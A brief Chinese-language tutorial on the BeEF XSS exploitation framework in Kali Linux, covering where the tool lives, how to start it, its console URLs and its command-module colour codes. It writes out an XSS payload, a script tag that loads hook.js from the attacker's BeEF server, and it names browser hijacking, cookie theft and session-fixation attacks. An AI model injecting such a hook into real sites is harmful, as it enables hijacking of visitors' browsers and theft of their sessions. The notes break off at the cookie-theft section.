目录
beef介绍
XSS 漏洞的利用平台,kali 自带
beef 的启动
Kali 中
工具目录 /usr/share/beef-xss
配置文件 config.yaml
启动 beef 工具的方法
1)beef-xss
2) /usr/share/beef-xss/beef
注:在启动前需要修改默认用户名及密码(config.yaml),否则会启动失败。
Web 界面管理控制台:http://192.168.11.167:3000/ui/panel
Shellcode:http://192.168.11.167:3000/hook.js
测试页面 :http://192.168.11.167:3000/demos/butcher/index.html
beef 的应用
确认有XSS漏洞后可利用网页重定向使其跳转至指定网页
<script src="http://192.168.11.167:3000/hook.js"></script>
1)浏览器劫持
命令模块:
绿色模块:表示模块适合目标浏览器,并且执行对客户端不可见
橙色模块:表示模块可用,但是对用户可见(CAM弹框申请权限)
红色模块:表示模块不适用与当前用户,有些红色模块可以正常执行
灰色模块:模块未在目标浏览器上测试过
2)Cookie 窃取与欺骗 -- 固定会话攻击
。。。。。。